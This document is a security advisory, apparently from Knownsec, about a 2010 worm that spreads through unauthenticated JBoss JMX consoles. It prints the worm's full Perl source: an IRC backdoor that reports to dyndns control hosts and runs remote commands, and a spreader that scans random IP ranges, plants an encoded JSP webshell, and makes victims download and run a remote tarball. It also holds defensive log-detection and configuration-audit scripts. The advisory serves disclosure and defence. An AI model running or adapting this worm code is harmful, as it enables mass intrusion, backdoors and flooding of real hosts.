JBOSS WORM Activity Alert
Recently the Knownsec Data Center has detected a rising trend in JBOSS WORM activity exploiting the "JBoss, JMX Console, default security misconfigured Attack". The number of affected websites keeps growing and includes sites of government departments and well-known enterprises.
According to the Knownsec security research team, the "JBoss, JMX Console, default security misconfigured Attack" is a JBOSS security vulnerability disclosed in 2010; an attacker who exploits it can upload a webshell and execute system commands. The worm built on this attack, once it has infected a JBOSS host, automatically scans for other vulnerable JBOSS hosts and plants on each infected host a remote-control backdoor client and a JSP webshell.
Worm code analysis:
fly.pl
use IO::Socket::INET;
my $processo = "/usr/local/apache/bin/httpds";
my $pid=fork;
exit if $pid;
$0="$processo"." "x16;
my @sops =("localhost","jboss.dyndns.biz","webstats.twilightparadox.com","weztatso.dyndns-remote.com","jasuyeifd.dyndns.info","chillbill.twilightparadox.com","cents.dyndns-web.com","its".time()."s.dyndns.info",);
my $port=2020*4;
my $chan="#jb";
my $boxing = `uname -a`;
$user = `whoami`;
$boxing =~ s/\r//g;
$boxing =~ s/\n//g;
$boxing =~ s/ //g;
$boxing =~ s/\s//g;
$user =~ s/\r//g;
$user =~ s/\n//g;
$user =~ s/ //g;
$user =~ s/\s//g;
while(1) {
my $nick="fly[".int(rand(999999999))."]";
retry: close($sk);
my $server = "";
while(length($server)<10) {
$server = $sops[int(rand(9))];
}
sleep(3);
my $sk = IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>$port,Proto=>"tcp") or goto retry;
$sk->autoflush(1);
print $sk "POST /index.php HTTP/1.1\r\nHost: $server:$port\r\nUser-Agent: Mozilla/5.0\r\nContent-Length: 385256291721361\r\n\r\nfile1=MZ%90%0a%0d\r\n";
print $sk "NICK $nick\r\n";
print $sk "USER ".$user." 8 * : ".$user."\r\n";
while($line = <$sk>) {
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/) {
print $sk "PONG :$1\r\n";
}
if($line =~ /welcome\sto/i) {
sleep(2); print $sk "JOIN $chan\r\n";
sleep(1);
print $sk "PRIVMSG $chan :UserName=$boxing\r\n";
}
if ($line =~ /PRIVMSG (.*) :.rsh\s"(.*)"/) {
$owner=$line;
$de=$2;
if($owner=~/iseee/gi) {
@shell = `$de`;
foreach $line (@shell) {
sendsk($sk, "PRIVMSG iseee :$line\r\n");
sleep(1);
}
}
}
if ($line=~ /PRIVMSG (.*) :.get\s"(.*)"\s"(.*)"/) {
$owner=$line;
$url=$2;
$mult=$3;
if($owner=~/iseee/gi) {
$url=~/http:\/\/(.*)\/(.*)/g;
for($xz=0;$xz<=$mult;$xz++) {
system("curl ".$url.">/dev/null&");
`curl "$url">/dev/null&`;
system("wget ".$url.">/dev/null&");
`wget "$url">/dev/null&`;
system("wget $url>/dev/null&");
}
sendsk($sk, "PRIVMSG iseee :Got $host/$path - $mult times\r\n");
}
}
if ($line=~ /PRIVMSG (.*) :.post\s"(.*)"\s"(.*)"/) {
$owner=$line;
$url=$2;
$ddata=$3;
if($owner=~/iseee/gi) {
$url=~/http:\/\/(.*)\/(.*)/g;
$host=$1;
$path=$2;
my $sck=new IO::Socket::INET(PeerAddr=>$host, PeerPort=>80);
print $sck "POST /$path HTTP/1.0\r\n". "Host: $host\r\n". "Connection: close\r\n". "Content-Length: ".length($ddata)."\r\n\r\n".$ddata;
sleep(1);
close($sck);
sendsk($sk, "PRIVMSG (.*) : Posted $host/$path - $mult\r\n");
}
}
}
}
sub sendsk() {
if ($#_ == 1) {
my $sk = $_[0];
print $sk "$_[1]\n";
}
else
{
print $sk "$_[0]\n";
}
}
fly.pl is the worm's backdoor script: it collects information about the victim host, reports it to a designated IRC channel and accepts commands from there. Testing showed, however, that the IRC servers in the several captured worm samples were already down.
lindb.pl
use IO::Socket;
my $mark = `ps aux | grep /usr/local/jboss/bin/javahttpd | grep -v grep`;
$ii = `whoami`;
if ($ii=~/root/g) {
system("sh treat.sh&");
}
if(length($mark)>260) {
die;
}
my $processo = "/usr/local/jboss/bin/javahttpd";
my $pid=fork;
exit if $pid;
$0="$processo"." "x16;
`make lnx`;
system("make lnx");
system("perl fly.pl&");
$idssvc = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=idssvc.war&argType=java.lang.String&arg1=idssvc&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%
73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0\r\n\r\n";
while(1) {
$partx=int(rand(255));
$fl="/tmp/sess_0088025413980486928597bf$partx";
$party=int(rand(255));
$sudoku="./pnscan -r JBoss -w \"HEAD / HTTP/1.0\\r\\n\\r\\n\" -t 6500 $partx.$party.0.0/16 80 > $fl";
system($sudoku);
open FILE, "$fl" or die "I cannot live like this!\n";
my @target = <FILE>;
close(FILE);
foreach $possible (@target) {
$possible=~s/\)//;
$possible=~s/\(//;
$possible=~/(.*)\.(.*)\.(.*)\.(.*)\s\s(.*):\s(.*)80\s/g;
$it="$1.$2.$3.$4";
$it=~s/\s//g;
$it=~s/ //g;
$it=~s/\t//g;
my $crap = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto np;
print $crap $idssvc;
$page = "";
$page .= $_ while <$crap>;
sleep(2);
if($page=~/200/||$page=~/500/) {
push(@target,$it);
}
np: close($crap);
}
foreach $it (@target) {
my $sck = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $sck "GET /idssvc/idssvc.jsp HTTP/1.0\r\nConnection: Close\r\n\r\n";
$page = "";
$page .= $_ while <$sck>;
if($page=~/comments/g) {
my $scka = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $scka "GET /idssvc/idssvc.jsp?comment=wget+http://webstats.dyndns.info/javadd.tar.gz HTTP/1.0\r\nConnection: Close\r\n\r\n";
sleep(4);
close($scka);
my $sckb = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $sckb "GET /idssvc/idssvc.jsp?comment=tar+xzvf+javadd.tar.gz HTTP/1.0\r\nConnection: Close\r\n\r\n";
sleep(3);
close($sckb);
my $sckd = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $sckd "GET /idssvc/idssvc.jsp?comment=perl+lindb.pl HTTP/1.0\r\nConnection: Close\r\n\r\n";
sleep(2);
close($sck);
}
nta: close($sck);
}
}
lindb.pl is the worm's core infection program. After infecting a host it downloads the remote worm code and invokes itself, while also running fly.pl to report back to the remote controller; it then scans random IP ranges for other hosts running JBOSS, attacks them, and on success starts a new round of infection.
Affected JBOSS versions:
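The infection chain above leaves a recognisable trail in the JBoss HTTP access log: a DeploymentFileRepository.store call to /jmx-console/HtmlAdaptor, then requests to the deployed /idssvc/idssvc.jsp with a comment parameter carrying the command. The following detection script is an added example, not part of the advisory or the worm; the log lines it runs over are constructed, with the worm's JSP body shortened. Note that the worm's deployment request is a HEAD, so the check deliberately does not filter on GET or POST.

```python
import re
from urllib.parse import unquote

# Combined-log-format line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not from the advisory); the first mirrors the
# worm's HEAD request to the JMX console with the JSP body shortened.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2010:03:14:07 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=idssvc.war&argType=java.lang.String&arg1=idssvc&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20page%20%25%3e&argType=boolean&arg4=True HTTP/1.0" 200 -
10.0.0.5 - - [12/Oct/2010:03:14:11 +0000] "GET /idssvc/idssvc.jsp HTTP/1.0" 200 412
10.0.0.5 - - [12/Oct/2010:03:14:15 +0000] "GET /idssvc/idssvc.jsp?comment=wget+http://example.invalid/javadd.tar.gz HTTP/1.0" 200 30
192.0.2.9 - - [12/Oct/2010:03:15:02 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def classify(path):
    """Label a request path as one of the worm's stages, or return None."""
    decoded = unquote(path).lower()
    query = decoded.split("?", 1)[1] if "?" in decoded else ""
    # Stage 1: DeploymentFileRepository.store via the JMX console writes the
    # JSP into a new WAR. The worm sends HEAD, so never filter on GET/POST.
    if (decoded.startswith("/jmx-console/htmladaptor")
            and "deploymentfilerepository" in query
            and "methodname=store" in query):
        return "jmx-console deploy"
    # Stages 2-3: the deployed idssvc.jsp; its 'comment' parameter is the
    # command the shell passes to Runtime.exec().
    if decoded.startswith("/idssvc/idssvc.jsp"):
        return "webshell command" if "comment=" in query else "webshell probe"
    return None


def scan_log(text):
    """Return (ip, method, label, path) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (label := classify(m["path"])):
            hits.append((m["ip"], m["method"], label, m["path"]))
    return hits


if __name__ == "__main__":
    for ip, method, label, path in scan_log(SAMPLE_LOG):
        print(f"{ip} {method:<4} {label:<18} {path[:60]}")
```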
• JBoss Application Server (AS) 4.0.x
• JBoss Communications Platform 1.2
• JBoss Enterprise Application Platform (EAP) 4.2, 4.3, 5.0
• JBoss Enterprise Portal Platform (EPP) 4.3
• JBoss Enterprise Web Platform (EWP) 5.0
• JBoss SOA-Platform (SOA-P) 4.2, 4.3, 5.0
According to the latest data from the Knownsec Data Center, although this vulnerability was discovered as early as April 2010, most vulnerable hosts on the Internet have still not patched it, which allowed the JBOSS WORM that appeared in October 2010 to remain active. Knownsec Data Center data also show that, in the worm activity recently observed, about 21% of roughly 100,000 JBOSS websites were infected with this worm, which shows how serious the JBOSS worm threat is.
As a company at the forefront of web security research in China, Knownsec takes a responsible attitude toward Internet users and site owners, actively issuing alerts and handling all kinds of security threats on the Internet to protect their interests. So far, the Knownsec security research team has sent alert notices to a number of government and enterprise websites affected by JBOSS WORM and helped them resolve the problem. Knownsec also urges the owners of other JBOSS sites affected by this vulnerability to upgrade to the latest JBOSS version as soon as possible to fix it, thereby protecting Internet users and curbing the spread of JBOSS WORM.
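Beyond upgrading, an administrator will want to confirm that the jmx-console web application itself is no longer reachable without authentication. The audit below is an added example, not from the advisory or from JBoss: it parses a jmx-console web.xml and reports a missing security-constraint, a constraint with no role, or a constraint that lists http-method values (in the servlet descriptor such a list restricts only the named verbs, and the worm's deployment request above is a HEAD, not a GET or POST). The two descriptors are constructed, and the JBossAdmin role name is assumed.

```python
import xml.etree.ElementTree as ET

# Constructed jmx-console web.xml fragments (not from the advisory). The first
# protects only GET and POST; the second drops the http-method list so the
# constraint applies to every verb, including the worm's HEAD.
WEAK_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""
FIXED_WEB_XML = "\n".join(l for l in WEAK_WEB_XML.splitlines() if "<http-method>" not in l)


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _texts(elem, name):
    """Text of every descendant element whose local name is `name`."""
    return [e.text.strip() for e in elem.iter() if _local(e.tag) == name and e.text]


def audit_jmx_console(web_xml):
    """Return a list of findings for a jmx-console web.xml; empty means OK."""
    root = ET.fromstring(web_xml)
    constraints = [e for e in root.iter() if _local(e.tag) == "security-constraint"]
    if not constraints:
        return ["no security-constraint: JMX console is reachable without authentication"]
    findings = []
    for sc in constraints:
        patterns = _texts(sc, "url-pattern")
        methods = _texts(sc, "http-method")
        if not _texts(sc, "role-name"):
            findings.append(f"constraint on {patterns} has no auth-constraint role")
        # Listing http-method values restricts only those verbs; any other
        # verb (HEAD, or an invented one) reaches HtmlAdaptor unauthenticated.
        if methods:
            findings.append(f"constraint on {patterns} limited to {methods}; "
                            "remove the http-method elements so all verbs are covered")
    return findings


if __name__ == "__main__":
    print(audit_jmx_console(WEAK_WEB_XML), audit_jmx_console(FIXED_WEB_XML))
```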